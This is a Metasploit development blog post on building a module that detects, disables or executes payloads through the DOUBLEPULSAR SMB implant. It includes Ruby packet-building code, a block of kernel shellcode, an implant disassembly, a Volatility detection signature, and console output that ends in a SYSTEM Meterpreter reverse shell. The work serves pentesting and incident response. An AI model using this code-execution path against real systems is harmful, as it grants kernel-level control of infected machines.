Open-Source Command and Control of the DOUBLEPULSAR Implant

Metasploit’s Development Diaries series sheds light on how Rapid7’s offensive research team analyzes vulnerabilities as candidates for inclusion in Metasploit Framework—in other words, how a vulnerability makes it through rigorous open-source committee to become a full-fledged Metasploit module.You can find previous Metasploit development diaries here and here. This quarter, we're going in a slightly different direction and detailing a path to remote code execution not in public-use hardware or software, but in a backdoor widely attributed to the NSA.

Metasploit's research team recently added a module to Framework that executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB. The DOUBLEPULSAR RCE module allows users to remotely disable the implant, which puts it in the rare (though not unique) category of Metasploit modules that have specific incident response utility in addition to offensive value.

Introduction

With RDP vulnerabilities being all the rage these days, I decided to revisit an unfinished idea I had when SMB vulnerabilities were still in vogue.

If infosec can rewind its memory two years ago, the Shadow Brokers leaked the so-called Equation Group's toolkit for Windows exploitation. Perhaps the most damaging code in that release was ETERNALBLUE, an SMB remote root exploit against a vast range of Windows versions. The code would quickly make its way into the WannaCry worm, which locked hundreds of thousands of systems in its cryptographic shackles.

On the same day as ETERNALBLUE, the world was introduced to DOUBLEPULSAR, a kernel-mode implant typically deployed by the exploit. DOUBLEPULSAR (hereafter referred to as DOPU or "the implant") had the ability to infect both SMB and RDP, but with the critical nature of ETERNALBLUE, SMB was the focus for most researchers. While most efforts were directed at detecting the implant via its "ping" functionality, the implant also had the capability to execute arbitrary kernel shellcode or to be disabled remotely. Perhaps most damning (or desirable) was the fact that the implant lacked authentication, offering an attribution-less backdoor into Windows systems around the world.

zerosum0x0 was one of the first researchers to analyze DOUBLEPULSAR. It was his work that I used to begin understanding the implant and its functionality. It is highly recommended reading. The rest of this post will concern the analysis we performed to exercise the implant's arbitrary code execution.

Why did we do this?

When ETERNALBLUE and DOUBLEPULSAR came to light, there were many who used the Fuzzbunch exploitation framework (part of the Shadow Brokers dump) to execute ETERNALBLUE against a target, infecting the target with DOPU, and then utilizing DOPU's DLL injection functionality (bootstrapped from its "exec" functionality) to inject a DLL payload into a userland process, bringing trivial ring3 code execution to a ring0 implant.

While this was fun and all, it posed a dangerous question: why would one purposefully infect a target with alleged NSA weapons-grade malware, just to gain code execution? Sure, it was the most accessible way to root unpatched Windows systems, but many users didn't think deeply on the ramifications. Fortunately, the research community directed its efforts at implementing the ETERNALBLUE exploit in open source, eschewing the closed-source, nation-state toolkit we knew so little about.

So, what if a target is already infected with DOUBLEPULSAR? The overarching opinion (rightfully so) is that your assessment has become an incident response situation. In that case, it may be helpful for defenders to be able to disable the implant without rebooting systems. Alternatively, it may be useful for pentesters (with proper approval) to leverage code execution against the implant using fully vetted, open-source tools, without the need to cast an exploit. There is already precedent for executing code against malware, some examples of which live in Metasploit. In any case, a forensic examination of infected systems is necessary, and disabling the implant doesn't obsolete patching.

Consequently, with our minds unburdened, and a healthy two years later, we sought to open-source code execution and neutralization of DOUBLEPULSAR in Metasploit. Let's walk through the development process.

The art of Ctrl-C, Ctrl-V

Everyone has done it at some point. Especially on Metasploit modules. And if you don't, you probably copy and paste your own code! (That's what I do most of the time. ;)

As zerosum0x0's MS17-010 and DOUBLEPULSAR scanner provided the perfect framework to hit the ground running, I shamelessly copied the file to a new module, which I named exploit/windows/smb/doublepulsar_rce. Having worked on the scanner, I was confident it would be a good starting point.

Give me a ping, Vasily. One ping only, please.

The scanner already implemented DOUBLEPULSAR's ping command to detect the implant. Moving the code to a check method, I gave it a go:

msf5 exploit(windows/smb/doublepulsar_rce) > check

[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[+] 192.168.56.115:445 - The target is vulnerable.
msf5 exploit(windows/smb/doublepulsar_rce) >

Cool, the module detected the implant correctly. More importantly, note that the implant returns its XOR key, which we'll use later to "encrypt" our shellcode for code execution.

Next up, implementing the kill command seemed like another easy win.

Ping, pong, the implant's dead

To improve code reuse, I defined a couple hashes for the implant's opcodes and status codes:

OPCODES = {
  ping: 0x23,
  exec: 0xc8,
  kill: 0x77
}

STATUS_CODES = {
  not_detected:   0x00,
  success:        0x10,
  invalid_params: 0x20,
  alloc_failure:  0x30
}

We also have a few utility methods, some from the scanner, to calculate implant status, XOR key, and architecture. These values are hidden in plain sight within real SMB packet values.

def calculate_doublepulsar_status(m1, m2)
  STATUS_CODES.key(m2.to_i - m1.to_i)
end

# algorithm to calculate the XOR Key for DoublePulsar knocks
def calculate_doublepulsar_xor_key(s)
  x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
  x & 0xffffffff  # this line was added just to truncate to 32 bits
end

# The arch is adjacent to the XOR key in the SMB signature
def calculate_doublepulsar_arch(s)
  s == 0 ? ARCH_X86 : ARCH_X64
end

Since the kill command is just the ping command with a different opcode (0x77 vs. 0x23), implementing the kill command was a breeze. I added a method to generate the expected SMB timeout value for a given opcode, based on zerosum0x0's analysis:

def generate_doublepulsar_timeout(op)
  k = SecureRandom.random_bytes(4).unpack('V').first
  0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
end

Then I shamelessly copied the trans2 method from lib/rex/proto/smb/client.rb. I ended up with the following code for an SMB TRANS2_SESSION_SETUP packet:

def make_smb_trans2_doublepulsar(opcode, body)
  setup_count = 1
  setup_data = [0x000e].pack('v')

  param = generate_doublepulsar_param(opcode, body)
  data = param + body.to_s

  pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct
  simple.client.smb_defaults(pkt['Payload']['SMB'])

  base_offset = pkt.to_s.length + (setup_count * 2) - 4
  param_offset = base_offset
  data_offset = param_offset + param.length

  pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
  pkt['Payload']['SMB'].v['Flags1'] = 0x18
  pkt['Payload']['SMB'].v['Flags2'] = 0xc007

  @multiplex_id = rand(0xffff)

  pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count
  pkt['Payload']['SMB'].v['TreeID'] = @tree_id
  pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id

  pkt['Payload'].v['ParamCountTotal'] = param.length
  pkt['Payload'].v['DataCountTotal'] = body.to_s.length
  pkt['Payload'].v['ParamCountMax'] = 1
  pkt['Payload'].v['DataCountMax'] = 0
  pkt['Payload'].v['ParamCount'] = param.length
  pkt['Payload'].v['ParamOffset'] = param_offset
  pkt['Payload'].v['DataCount'] = body.to_s.length
  pkt['Payload'].v['DataOffset'] = data_offset
  pkt['Payload'].v['SetupCount'] = setup_count
  pkt['Payload'].v['SetupData'] = setup_data
  pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)
  pkt['Payload'].v['Payload'] = data

  pkt.to_s
end

Hopeful that my code would work on the first try, I tested the new implant neutralization code:

msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:445 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) >

Success! If you were to run check again, the implant should not be detected:

msf5 exploit(windows/smb/doublepulsar_rce) > check

[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[-] 192.168.56.115:445 - DOUBLEPULSAR not detected or disabled
[*] 192.168.56.115:445 - The target is not exploitable.
msf5 exploit(windows/smb/doublepulsar_rce) >

With two of the three implant commands implemented, it was time to focus on the third and final: the Holy Grail of code execution.

What is your quest? To seek the Holy Grail!

Because DOUBLEPULSAR expects to execute kernel shellcode, we couldn't use any Metasploit payloads without a kernel-mode stub first, and we surely didn't want to use the Equation Group's DLL injection shellcode, though sufficiently analyzed by Countercept (now F-Secure).

Thankfully, zerosum0x0 wrote custom shellcode for ETERNALBLUE that could be repurposed for DOUBLEPULSAR, albeit with a small modification. Since the syscall overwrite in the copied shellcode was unnecessary for this use case, we undefined it:

diff --git a/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm b/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
index bff0b1fd73..1d867a9ebf 100644
--- a/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
+++ b/external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
@@ -41,7 +41,7 @@ global payload_start
 %define USE_X64                       ; x64 payload
 ;%define STATIC_ETHREAD_DELTA          ; use a pre-calculated ThreadListEntry
 %define ERROR_CHECKS                  ; lessen chance of BSOD, but bigger size
-%define SYSCALL_OVERWRITE             ; to run at process IRQL in syscall
+%undef SYSCALL_OVERWRITE             ; to run at process IRQL in syscall
 ; %define CLEAR_DIRECTION_FLAG         ; if cld should be run

 ; hashes for export directory lookups

I reassembled the modified shellcode with nasm -w-other -o >(xxd -p -c 16 | sed 's/../\\x&/g') external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm and updated the module:

def make_kernel_shellcode(proc_name)
  # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
  # Length: 780 bytes
  "\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" +
  "\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" +
  "\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" +
  "\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" +
  "\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" +
  "\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" +
  "\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" +
  "\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" +
  "\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" +
  "\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" +
  "\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" +
  "\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" +
  "\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +
  generate_process_hash(proc_name.upcase) +
  "\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" +
  "\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" +
  "\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" +
  "\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" +
  "\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" +
  "\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" +
  "\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" +
  "\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" +
  "\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" +
  "\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" +
  "\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" +
  "\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" +
  "\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" +
  "\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" +
  "\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" +
  "\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" +
  "\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" +
  "\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" +
  "\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" +
  "\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" +
  "\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" +
  "\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" +
  "\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
  "\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" +
  "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" +
  "\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" +
  "\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" +
  "\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" +
  "\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" +
  "\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" +
  "\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" +
  "\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" +
  "\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" +
  "\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" +
  "\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" +
  "\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"
end

Metasploit has an extensive library of code for exploitation, but it curiously didn't have any such code for XOR with a variable-length key, so I went ahead and added it to the Rex::Text.xor method. This would be a requirement for DOUBLEPULSAR's XOR stream cipher, which would be used to encrypt the shellcode.

print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
vprint_status("Total shellcode length: #{shellcode.length} bytes")

print_status("Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}")
xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)

Because DOUBLEPULSAR expects shellcode to be chunked in 4096-byte blocks, and our total shellcode size falls well within that chunk size, we pad the difference after the user-mode payload with random bytes and send only one 4096-byte chunk. This ensures consistent shellcode size and alignment, and it provides a modicum of obfuscation. Since the kernel shellcode calls the CreateThread function, and the EXITFUNC option in Metasploit is set to thread, there are no issues with the random padding. Yeah, it's a hack.

The last piece of the puzzle

When I crafted the SMB TRANS2_SESSION_SETUP packet, I zeroed out its parameters, since they weren't necessary for the ping and kill commands. However, the exec command required specific parameters to be sent. I didn't know what to fill them with yet, but it was clear the XOR key was involved.

With zeroed-out parameters, code execution was blocked by checks in the implant. Since I had been working on the module for most of an evening, having failed to determine the correct parameters (short of breaking out WinDbg), I shelved the module to work on another task. Some time later, I reached out to Jacob to see if he was interested in figuring out the missing piece.

The following analysis is adapted from notes by former Metasploit researcher Jacob Robles.

We begin our analysis of the implant's checks by viewing its handler in WinDbg. Using the command from the deadlisting, we get the address of the implant's code in memory on the target system:

kd> dps srv!SrvTransaction2DispatchTable
fffff880`03a2c760  fffff880`03a96110 srv!SrvSmbOpen2
fffff880`03a2c768  fffff880`03a5d3e0 srv!SrvSmbFindFirst2
fffff880`03a2c770  fffff880`03a938d0 srv!SrvSmbFindNext2
fffff880`03a2c778  fffff880`03a5f570 srv!SrvSmbQueryFsInformation
fffff880`03a2c780  fffff880`03a886e0 srv!SrvSmbSetFsInformation
fffff880`03a2c788  fffff880`03a5cf30 srv!SrvSmbQueryPathInformation
fffff880`03a2c790  fffff880`03a96640 srv!SrvSmbSetPathInformation
fffff880`03a2c798  fffff880`03a5ae40 srv!SrvSmbQueryFileInformation
fffff880`03a2c7a0  fffff880`03a5ee90 srv!SrvSmbSetFileInformation
fffff880`03a2c7a8  fffff880`03a7c8d0 srv!SrvSmbFindNotify
fffff880`03a2c7b0  fffff880`03a96470 srv!SrvSmbIoctl2
fffff880`03a2c7b8  fffff880`03a7c8d0 srv!SrvSmbFindNotify
fffff880`03a2c7c0  fffff880`03a7c8d0 srv!SrvSmbFindNotify
fffff880`03a2c7c8  fffff880`03a88e80 srv!SrvSmbCreateDirectory2
fffff880`03a2c7d0  fffffa80`0226e060
fffff880`03a2c7d8  fffff880`03a7c6d0 srv!SrvTransactionNotImplemented

The address to the implant's handler is at offset 0x70 from the start of the dispatch table. We then retrieve the handler's disassembly by running u poi(srv!SrvTransaction2DispatchTable+0x70) L100:

kd> u poi(srv!SrvTransaction2DispatchTable+0x70) L100
fffffa80`0226e060 57              push    rdi
fffffa80`0226e061 56              push    rsi
fffffa80`0226e062 53              push    rbx
fffffa80`0226e063 55              push    rbp
fffffa80`0226e064 4154            push    r12
fffffa80`0226e066 4155            push    r13
fffffa80`0226e068 4156            push    r14
fffffa80`0226e06a 4157            push    r15
fffffa80`0226e06c 4989e4          mov     r12,rsp
fffffa80`0226e06f 4881ec08010000  sub     rsp,108h
fffffa80`0226e076 4989cf          mov     r15,rcx
fffffa80`0226e079 488d2de0ffffff  lea     rbp,[fffffa80`0226e060]
fffffa80`0226e080 6681e500f0      and     bp,0F000h
fffffa80`0226e085 48894d58        mov     qword ptr [rbp+58h],rcx
[snip]

The module at the time showed 0xc8 as the code for shellcode execution through the implant, which is also listed in the deadlisting. However, shellcode execution was failing with a status that indicated invalid parameters, 0x20. The branch for the 0xc8 code shows the checks that need to be passed for shellcode execution.

The first check is shown in the following disassembly:

fffffa80`0226e0fd 4831db          xor     rbx,rbx
fffffa80`0226e100 4831f6          xor     rsi,rsi
fffffa80`0226e103 4831ff          xor     rdi,rdi
fffffa80`0226e106 498b45d8        mov     rax,qword ptr [r13-28h]   ; SESSION_SETUP Parameters pointer
fffffa80`0226e10a 8b18            mov     ebx,dword ptr [rax]
fffffa80`0226e10c 8b7004          mov     esi,dword ptr [rax+4]
fffffa80`0226e10f 8b7808          mov     edi,dword ptr [rax+8]
fffffa80`0226e112 8b4d48          mov     ecx,dword ptr [rbp+48h]   ; XOR key
fffffa80`0226e115 31cb            xor     ebx,ecx                   ; Total shellcode size
fffffa80`0226e117 31ce            xor     esi,ecx                   ; Size of shellcode data in this request
fffffa80`0226e119 31cf            xor     edi,ecx                   ; Offset within shellcode buffer to start copying data to
fffffa80`0226e11b 413b7510        cmp     esi,dword ptr [r13+10h]
fffffa80`0226e11f 757b            jne     fffffa80`0226e19c         ; Invalid parameters

After a few registers are cleared, ebx, esi, and edi are set to values taken from the SMB Trans2 request, specifically offsets within the SESSION_SETUP parameters pointed to by rax. The registers are then XORed with the ecx register, which contains the XOR key. Then the comparison determines whether the XORed value from the SESSION_SETUP parameters (offset + 4) matches the Total Data Count field, [r13+10h], of the Trans2 request. This means the second 4-byte block of SESSION_SETUP parameters should be key ^ total data count to pass the first parameter check.

After the first check, another comparison occurs, but this time the comparison is with the first 4-byte block of the SESSION_SETUP parameters:

fffffa80`0226e121 3b5d54          cmp     ebx,dword ptr [rbp+54h]   ; Stored shellcode size
fffffa80`0226e124 488b454c        mov     rax,qword ptr [rbp+4Ch]   ; Stored shellcode buffer pointer
fffffa80`0226e128 7416            je      fffffa80`0226e140
fffffa80`0226e12a e8d1000000      call    fffffa80`0226e200
fffffa80`0226e12f 488d5304        lea     rdx,[rbx+4]
fffffa80`0226e133 4831c9          xor     rcx,rcx
fffffa80`0226e136 ff5510          call    qword ptr [rbp+10h]       ; nt!ExAllocatePool
fffffa80`0226e139 4889454c        mov     qword ptr [rbp+4Ch],rax   ; Store shellcode pointer
fffffa80`0226e13d 895d54          mov     dword ptr [rbp+54h],ebx   ; Store shellcode size

This comparison checks if a stored global value, [rbp+54h], equals the XORed first 4-byte SESSION_SETUP parameters block. The data stored at [rbp+54h] is zero or the number of bytes that have previously been allocated for the shellcode. If previously allocated bytes match with the 4-byte block, then the rest of that code segment is jumped over. Otherwise, nt!ExAllocatePool is called to allocate a buffer for the shellcode. The shellcode pointer is stored at [rbp+4Ch], and the number of bytes allocated is stored at [rbp+54h].

Since an allocation may occur in the previous block of code, the following block checks for a NULL shellcode pointer:

fffffa80`0226e140 4885c0          test    rax,rax
fffffa80`0226e143 745b            je      fffffa80`0226e1a0  ; ALLOC failed
fffffa80`0226e145 4801f7          add     rdi,rsi            ; Offset within buffer + Size of shellcode data in request
fffffa80`0226e148 4839df          cmp     rdi,rbx
fffffa80`0226e14b 774f            ja      fffffa80`0226e19c  ; Invalid parameters

If the shellcode pointer is NULL, then the code jumps to a location that will return an "allocation failed" status code, 0x30. If the allocation succeeded, then another check is performed to validate the size of the data that will be copied into the shellcode buffer. The next check fails if the size of the offset within the buffer to start copying to, plus the total shellcode data within the Trans2 request, is larger than the allocated shellcode buffer size. This check ensures that data won't be copied past the allocated buffer region.

After the checks are passed, the shellcode data from the Trans2 request is copied into memory and decoded:

fffffa80`0226e14d 4829f7          sub     rdi,rsi
fffffa80`0226e150 4801c7          add     rdi,rax                          ; Offset into allocated shellcode buffer
fffffa80`0226e153 57              push    rdi
fffffa80`0226e154 4889f1          mov     rcx,rsi
fffffa80`0226e157 51              push    rcx
fffffa80`0226e158 498b75e8        mov     rsi,qword ptr [r13-18h]          ; Trans2 Request SESSION_SETUP Data
fffffa80`0226e15c f3a4            rep movs byte ptr [rdi],byte ptr [rsi]   ; Copy SESSION_SETUP Data to shellcode buffer
fffffa80`0226e15e 59              pop     rcx
fffffa80`0226e15f 48c1e902        shr     rcx,2
fffffa80`0226e163 5e              pop     rsi
fffffa80`0226e164 8b5548          mov     edx,dword ptr [rbp+48h]          ; XOR key
fffffa80`0226e167 3116            xor     dword ptr [rsi],edx              ; Decode shellcode
fffffa80`0226e169 4883c604        add     rsi,4
fffffa80`0226e16d e2f8            loop    fffffa80`0226e167                ; Decode 4-byte blocks at a time
fffffa80`0226e16f 4801d8          add     rax,rbx
fffffa80`0226e172 4839c6          cmp     rsi,rax
fffffa80`0226e175 7c21            jl      fffffa80`0226e198                ; Success, expect more data
fffffa80`0226e177 ff554c          call    qword ptr [rbp+4Ch]              ; Call shellcode
fffffa80`0226e17a e881000000      call    fffffa80`0226e200

The destination for the copied data is an offset into the shellcode buffer, which is specified by the SESSION_SETUP parameters. Then the copied data is decoded using the XOR key, which means the shellcode data in the Trans2 request must be encoded before it is sent to the target. After the loop is finished, the last decoded address is compared with the expected ending address of the shellcode buffer (start of shellcode buffer + total size of shellcode). If the addresses do not match, then a "success" status is returned, but more data is expected in future requests before the shellcode in memory will be executed. If the addresses match, then the shellcode is executed, and the buffer is deallocated.

The XOR key is updated after the shellcode executes, and a success code is returned to the client:

fffffa80`0226e17f 8b4544          mov     eax,dword ptr [rbp+44h]
fffffa80`0226e182 d1e8            shr     eax,1
fffffa80`0226e184 4831c9          xor     rcx,rcx
fffffa80`0226e187 88c1            mov     cl,al
fffffa80`0226e189 4801e9          add     rcx,rbp
fffffa80`0226e18c 8b09            mov     ecx,dword ptr [rcx]
fffffa80`0226e18e 31c8            xor     eax,ecx
fffffa80`0226e190 894544          mov     dword ptr [rbp+44h],eax    ; Update XOR key
fffffa80`0226e193 e843000000      call    fffffa80`0226e1db
fffffa80`0226e198 b010            mov     al,10h                     ; SUCCESS code
fffffa80`0226e19a eb08            jmp     fffffa80`0226e1a4

Shellcode execution is now complete.

Finishing the module

With Jacob's analysis of the implant's checks and our tag-teamed kernel debugging, we could complete the module:

def generate_doublepulsar_param(op, body)
  case OPCODES.key(op)
  when :ping, :kill
    "\x00" * 12
  when :exec
    Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))
  end
end

Crossing our fingers, we tested code execution with a Meterpreter payload:

msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.115:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

"I'm in."

Caveats

While DOUBLEPULSAR is a sophisticated kernel-mode implant, its network signature is well-researched, and detection of the implant is highly accurate. On the system front, you cannot escape from memory forensics if kernel memory can be analyzed. Furthermore, any code or commands you execute through the implant are fair game for detection in userspace.

As a naive example, using Volatility's yarascan plugin with the byte string from Jacob's first disassembled implant check, we can see the DOUBLEPULSAR code in kernel memory:

wvu@kharak:~/Downloads$ VBoxManage debugvm "Windows Server 2008 R2" dumpvmcore --filename doublepulsar.core
wvu@kharak:~/Downloads$ vol.py -f doublepulsar.core --profile Win2008R2SP1x64 yarascan -KY "{ 48 31 db 48 31 f6 48 31 ff 49 8b 45 d8 8b 18 8b 70 04 8b 78 08 8b 4d 48 31 cb 31 ce 31 cf 41 3b 75 10 75 7b }"
Volatility Foundation Volatility Framework 2.6.1
[snip]
Rule: r1
Owner: (Unknown Kernel Memory)
0xffffffd00e5a  48 31 db 48 31 f6 48 31 ff 49 8b 45 d8 8b 18 8b   H1.H1.H1.I.E....
0xffffffd00e6a  70 04 8b 78 08 8b 4d 48 31 cb 31 ce 31 cf 41 3b   p..x..MH1.1.1.A;
0xffffffd00e7a  75 10 75 7b 3b 5d 54 48 8b 45 4c 74 16 e8 d1 00   u.u{;]TH.ELt....
0xffffffd00e8a  00 00 48 8d 53 04 48 31 c9 ff 55 10 48 89 45 4c   ..H.S.H1..U.H.EL
0xffffffd00e9a  89 5d 54 48 85 c0 74 5b 48 01 f7 48 39 df 77 4f   .]TH..t[H..H9.wO
0xffffffd00eaa  48 29 f7 48 01 c7 57 48 89 f1 51 49 8b 75 e8 f3   H).H..WH..QI.u..
0xffffffd00eba  a4 59 48 c1 e9 02 5e 8b 55 48 31 16 48 83 c6 04   .YH...^.UH1.H...
0xffffffd00eca  e2 f8 48 01 d8 48 39 c6 7c 21 ff 55 4c e8 81 00   ..H..H9.|!.UL...
0xffffffd00eda  00 00 8b 45 44 d1 e8 48 31 c9 88 c1 48 01 e9 8b   ...ED..H1...H...
0xffffffd00eea  09 31 c8 89 45 44 e8 43 00 00 00 b0 10 eb 08 b0   .1..ED.C........
0xffffffd00efa  20 eb 04 b0 30 eb 00 48 8b 4d 28 b4 00 66 01 41   ....0..H.M(..f.A
0xffffffd00f0a  1e 48 8b 45 20 4c 89 f9 4c 89 e4 41 5f 41 5e 41   .H.E.L..L..A_A^A
0xffffffd00f1a  5d 41 5c 5d 5b 5e 5f ff 60 78 31 c0 88 c8 c1 e9   ]A\][^_.`x1.....
